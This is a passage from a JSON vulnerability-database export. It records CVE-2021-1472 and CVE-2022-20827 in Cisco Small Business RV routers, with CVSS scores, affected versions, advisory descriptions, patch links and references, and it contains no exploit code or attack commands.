                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 9.8,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2021-1472",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Unchanged",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2021-1472",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2021-1472",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2021-1472",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202104-433",
                "trust": 0.6,
                "value": "CRITICAL"
              },
              {
                "author": "VULMON",
                "id": "CVE-2021-1472",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities exist in the web-based management interface of Cisco Small Business RV Series Routers. A remote attacker could execute arbitrary commands or bypass authentication and upload files on an affected device. For more information about these vulnerabilities, see the Details section of this advisory",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1472"
          }
        ],
        "trust": 1.71
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2021-1472",
            "trust": 3.3
          },
          {
            "db": "PACKETSTORM",
            "id": "162238",
            "trust": 1.7
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315",
            "trust": 0.8
          },
          {
            "db": "PACKETSTORM",
            "id": "165799",
            "trust": 0.6
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2021.1172",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2021-1472",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "id": "VAR-202104-0893",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2024-11-23T21:58:41.960000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-sb-rv-bypass-inject-Rbhgvfdx",
            "trust": 0.8,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-rv-bypass-inject-Rbhgvfdx"
          },
          {
            "title": "Cisco Small Business RV Series Routers Buffer error vulnerability fix",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=147015"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-sb-rv-bypass-inject-Rbhgvfdx"
          },
          {
            "title": "\u76ee\u5f55\nWindows\u751f\u4ea7\u529b\u63d0\u5347\uff08linux\u5316\uff09\nburpsuite2021.5.1\u4f7f\u7528\u65b9\u6cd5\nAcunetix Premium \uff08AWVS\uff09\u4f7f\u7528\u65b9\u6cd5\n\u4ee3\u7406\u8f6f\u4ef6\u4f7f\u7528\u65b9\u6cd5",
            "trust": 0.1,
            "url": "https://github.com/zmylml/yangzifun "
          },
          {
            "title": "Kenzer Templates [5170] [DEPRECATED]",
            "trust": 0.1,
            "url": "https://github.com/ARPSyndicate/kenzer-templates "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-119",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-287",
            "trust": 1.0
          },
          {
            "problemtype": "Buffer error (CWE-119) [ Other ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sb-rv-bypass-inject-rbhgvfdx"
          },
          {
            "trust": 1.8,
            "url": "http://seclists.org/fulldisclosure/2021/apr/39"
          },
          {
            "trust": 1.7,
            "url": "http://packetstormsecurity.com/files/162238/cisco-rv-authentication-bypass-code-execution.html"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2021-1472"
          },
          {
            "trust": 0.6,
            "url": "https://packetstormsecurity.com/files/165799/cisco-small-business-rv-series-authentication-bypass-command-injection.html"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2021.1172"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/287.html"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "https://www.rapid7.com/db/modules/exploit/linux/http/cisco_rv_series_authbypass_and_rce/"
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "VULMON",
            "id": "CVE-2021-1472"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          },
          {
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2021-04-08T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1472"
          },
          {
            "date": "2021-12-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "date": "2021-04-07T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          },
          {
            "date": "2021-04-08T04:15:13.687000",
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2023-11-07T00:00:00",
            "db": "VULMON",
            "id": "CVE-2021-1472"
          },
          {
            "date": "2021-12-10T09:10:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          },
          {
            "date": "2022-08-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          },
          {
            "date": "2024-11-21T05:44:26.040000",
            "db": "NVD",
            "id": "CVE-2021-1472"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Buffer error vulnerability in Cisco Small Business RV series routers",
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-005315"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "authorization issue",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202104-433"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-202208-0321

    Vulnerability from variot - Updated: 2024-08-14 14:10

    Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Multiple Cisco Small Business router products contain an OS command injection vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Authentication is not required to exploit this vulnerability. The specific flaw exists within the wfapp application. A crafted server response can trigger execution of a system call composed from an attacker-supplied string. An attacker can leverage this vulnerability to execute code in the context of root. Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. This advisory is available at the following link: tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-202208-0321",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "rv345",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv260w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv340",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv340w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv160w",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv260p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv345p",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.03.26"
          },
          {
            "model": "rv160",
            "scope": "lt",
            "trust": 1.0,
            "vendor": "cisco",
            "version": "1.0.01.05"
          },
          {
            "model": "rv160 vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260 vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345p",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv160w wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv345",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260w wireless-ac vpn \u30eb\u30fc\u30bf",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv260p vpn \u30eb\u30fc\u30bf with poe",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340w",
            "scope": null,
            "trust": 0.8,
            "vendor": "\u30b7\u30b9\u30b3\u30b7\u30b9\u30c6\u30e0\u30ba",
            "version": null
          },
          {
            "model": "rv340",
            "scope": null,
            "trust": 0.7,
            "vendor": "cisco",
            "version": null
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Q. Kaiser from IoT Inspector Research Lab",
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          }
        ],
        "trust": 0.7
      },
      "cve": "CVE-2022-20827",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "HIGH",
                "baseScore": 10.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2022-20827",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "HIGH",
                "attackVector": "NETWORK",
                "author": "ykramarz@cisco.com",
                "availabilityImpact": "HIGH",
                "baseScore": 9.0,
                "baseSeverity": "CRITICAL",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.2,
                "id": "CVE-2022-20827",
                "impactScore": 6.0,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "CHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.1"
              },
              {
                "attackComplexity": "Low",
                "attackVector": "Network",
                "author": "NVD",
                "availabilityImpact": "High",
                "baseScore": 10.0,
                "baseSeverity": "Critical",
                "confidentialityImpact": "High",
                "exploitabilityScore": null,
                "id": "CVE-2022-20827",
                "impactScore": null,
                "integrityImpact": "High",
                "privilegesRequired": "None",
                "scope": "Changed",
                "trust": 0.8,
                "userInteraction": "None",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                "version": "3.0"
              },
              {
                "attackComplexity": "LOW",
                "attackVector": "ADJACENT",
                "author": "ZDI",
                "availabilityImpact": "HIGH",
                "baseScore": 8.8,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 2.8,
                "id": "CVE-2022-20827",
                "impactScore": 5.9,
                "integrityImpact": "HIGH",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 0.7,
                "userInteraction": "NONE",
                "vectorString": "AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2022-20827",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "ykramarz@cisco.com",
                "id": "CVE-2022-20827",
                "trust": 1.0,
                "value": "CRITICAL"
              },
              {
                "author": "NVD",
                "id": "CVE-2022-20827",
                "trust": 0.8,
                "value": "Critical"
              },
              {
                "author": "ZDI",
                "id": "CVE-2022-20827",
                "trust": 0.7,
                "value": "HIGH"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202208-2168",
                "trust": 0.6,
                "value": "CRITICAL"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an unauthenticated, remote attacker to execute arbitrary code or cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Multiple Cisco Small Business router products contain an OS command injection vulnerability. Information may be obtained or tampered with, and service operation may be interrupted (DoS). Authentication is not required to exploit this vulnerability. The specific flaw exists within the wfapp application. A crafted server response can trigger execution of a system call composed from an attacker-supplied string. An attacker can leverage this vulnerability to execute code in the context of root. \nCisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities. \nThis advisory is available at the following link: tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20827"
          }
        ],
        "trust": 2.34
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2022-20827",
            "trust": 4.0
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749",
            "trust": 0.8
          },
          {
            "db": "ZDI_CAN",
            "id": "ZDI-CAN-15984",
            "trust": 0.7
          },
          {
            "db": "ZDI",
            "id": "ZDI-22-1047",
            "trust": 0.7
          },
          {
            "db": "AUSCERT",
            "id": "ESB-2022.3837",
            "trust": 0.6
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168",
            "trust": 0.6
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20827",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20827"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "id": "VAR-202208-0321",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VARIoT devices database",
            "id": null
          }
        ],
        "trust": 0.18174963
      },
      "last_update_date": "2024-08-14T14:10:41.011000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "cisco-sa-sb-mult-vuln-CbVp4SUR",
            "trust": 0.8,
            "url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR"
          },
          {
            "title": "Cisco has issued an update to correct this vulnerability.",
            "trust": 0.7,
            "url": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-sb-mult-vuln-CbVp4SUR"
          },
          {
            "title": "Cisco Small Business RV Series Routers Fixes for operating system command injection vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=204185"
          },
          {
            "title": "Cisco: Cisco Small Business RV Series Routers Vulnerabilities",
            "trust": 0.1,
            "url": "https://vulmon.com/vendoradvisory?qidtp=cisco_security_advisories_and_alerts_ciscoproducts\u0026qid=cisco-sa-sb-mult-vuln-CbVp4SUR"
          },
          {
            "title": "The Register",
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2022/08/05/cisco_smb_routers_critical_flaws/"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20827"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-120",
            "trust": 1.0
          },
          {
            "problemtype": "CWE-78",
            "trust": 1.0
          },
          {
            "problemtype": "OS Command injection (CWE-78) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.4,
            "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-sb-mult-vuln-cbvp4sur"
          },
          {
            "trust": 0.8,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2022-20827"
          },
          {
            "trust": 0.6,
            "url": "https://www.auscert.org.au/bulletins/esb-2022.3837"
          },
          {
            "trust": 0.6,
            "url": "https://cxsecurity.com/cveshow/cve-2022-20827/"
          },
          {
            "trust": 0.1,
            "url": "https://www.theregister.co.uk/2022/08/05/cisco_smb_routers_critical_flaws/"
          }
        ],
        "sources": [
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20827"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "db": "VULMON",
            "id": "CVE-2022-20827"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          },
          {
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-08-04T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "date": "2023-10-06T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "date": "2022-08-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          },
          {
            "date": "2022-08-10T09:15:08.537000",
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-08-04T00:00:00",
            "db": "ZDI",
            "id": "ZDI-22-1047"
          },
          {
            "date": "2023-10-06T06:23:00",
            "db": "JVNDB",
            "id": "JVNDB-2022-016749"
          },
          {
            "date": "2022-08-15T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          },
          {
            "date": "2023-11-07T03:43:04.223000",
            "db": "NVD",
            "id": "CVE-2022-20827"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202208-2168"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "OS command injection vulnerability in multiple Cisco Small Business router products",
